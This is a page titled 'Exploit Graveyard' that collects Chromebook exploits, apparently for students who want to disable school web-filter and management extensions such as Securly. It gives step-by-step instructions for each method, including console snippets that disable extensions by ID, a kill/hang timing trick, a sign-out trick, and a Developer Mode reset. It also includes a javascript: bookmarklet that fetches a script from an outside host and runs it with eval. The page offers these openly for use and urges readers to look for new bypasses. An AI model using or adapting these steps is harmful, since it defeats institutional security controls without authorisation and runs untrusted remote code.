Exploit Graveyard

VMC/Crosh Disable

Patched as of v116

Found by VK6 on Discord.

Go to https://local.ading.dev/vmc.html for the instructions

Prerequisites:

A managed Chromebook with crosh enabled

The VmManagementCliAllowed policy either unset or set to true

Some form of removable media for noting down extension IDs (only useful for the second method and not required, but this prevents you from mistyping an extension ID).

LTBeef Repatch (Mostly Patched)

Patched on v115

Found by SprinkzMC#8421

After one of the most broken exploits in the Chromebook (LTBeef/ExtensionX) got patched back in v106.0 and Killcurly got patched on v112 this is probably the last exploit that uses the LTBeef name.

#1: Go to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json

#2: Open inspect element (CTRL+SHIFT+I)

IF YOU USE A DIFFERENT BLOCKER EXTENSION

• Go to chrome://extensions

• Click on details for the extension and look at the link. It should look like chrome://extensions/?id=Extension (If you don't want to do that go HERE for a list of extension IDs)

#3: If you use Securly paste this code in the console of the inspect page and hit enter, if not, just replace the ID in the code

chrome.management.setEnabled('iheobagjkfklnlikgihanlhcddjoihkg',false) 

#4: It should say Promise {<pending>} and your websites should be unblocked.

JPCMG

Patched on v114 I believe

Found by Nyaann#3881

This is another variation of the LTBeef exploit, it is very much like the other ones on the list.

#1: Go to chrome://serviceworker-internals

#2: Find your extension, it has varying levels of success but you should be able to find it by searching for your extension ID with CTRL+F and pasting it in 

#3: Hit the start button then the inspect button, and run this code:

chrome.management.setEnabled('<plugin id here>',false)

This is a list of the patched exploits in the Chromebook OS, these are useful if you're on a lower version or want to find a loophole/repatch in them like we have been doing with LTbeef

LTMeat

Patched on v115 

Found by Bypassi

This exploit is listed at #3 right now because it's timing-related and the new LTBeef bypass is much more reliable and easy to do. Bypassi is the founder and I strongly recommend showing them some love at https://bypassi.com. If you want to see the exploit from their website, where they have more in-depth instructions visit it here: https://ltbeef.bypassi.com

#1: Find a page belonging to the extension you want to disable. You'll need your extension's 32-character ID to continue. If you're trying to bypass stuff, try finding it in a filter extension ID list HERE.

#2: Once you have the ID, you'll be guaranteed to get to a working chrome-extension:// page by visiting the manifest file: (with your extension's ID substituted in, of course)

chrome-extension://extension_id_here/manifest.json

#3: Bookmark the extension page (bookmark A) if you wish. Then, bookmark chrome://kill (B) and chrome://hang (C).

#4: While on the extension page (A), click the chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.

#5: Instantly start spamming chrome://hang (bookmark C) and quickly reload the page while spamming using the refresh key on your keyboard (or less ideally, ctrl+R). You should have reloaded within one or two seconds of killing the page. If this doesn't work visit Bypassi's website and see the instructions there on his blog.

Killcurly Securly Breaker

v111 and below

This was intended for Securly, but works for the following

- Securly

- Cisco Umbrella

- Palo Alto

- Hapara

#1: Visit chrome://settings/signOut (the O must be capitalized) and click the blue button. If this is "blocked_by_administrator" tough titties suck it up and do your schoolwork

#2: Go to the Securly for Chromebook details in chrome://extensions and click "Allow access to file URLs".

#3: Securly will now reload and be broken.

#4: Go to https://tinyurl.com/addsession and add your school account back. (personal accounts may even work for some people)

This has to be repeated each time you sign out of your computer. Feel free to test this for other extensions too.

LTBEEF Disabler

106.0 and before

Easily the best unblock method, because there are no downsides besides maybe staff catching on to what you're doing. There is also a different way to do this method, but it still is patched on v107.0 and above.

1. Create a new bookmark, and replace the link with this one (Copy it and replace the bookmark link, don't go to the site)

javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});

2. Go to https://chrome.google.com/webstorex 

3. Click on the bookmark you made, and then you have the ability to enable and disable the extensions.

4. Disable your blocker with the switch and any other extensions you may want to remove too.

Dev Mode Bruteforce

Depends on whether your admin disabled this

This is easily one of the worst methods for unblocking school chromebooks. What it does is completely removes the admins off of your chromebook, but it's probably been patched for good, as I haven't seen anyone do it successfully after 2018 on a managed chromebook. It is still avalable on personal ones, if your school hasn't put blockers on that. On top of that it resets everything on your chromebook.

1. Turn off your Chromebook.

2. Turn your Chromebook back on.

3. While your Chromebook is restarting, simultaneously hold the Esc key, Refresh key, and Power button.

4. Press and hold the Ctrl and D keys at the same time when a warning pops up. A message may appear asking about OS verification. If so, click Enter.

5. The device restarts and starts to set up Developer Mode.

6. Press the Ctrl and D keys when a screen pops up saying, "OS verification is off."

7. Then you should just have to follow up the instructions on screen and then make sure to use your person email to sign in.

8. After all that you hopefully will have a completely unaffiliated chromebook.

The trouble that I have with this method is that usually the Chromebook just resets and boots back into the G-Suite sign-in screen or it just says "Developer Mode is disabled on this chromebook by system policy". If that happens just restart your chromebook by tapping or holding the refresh button on your keyboard.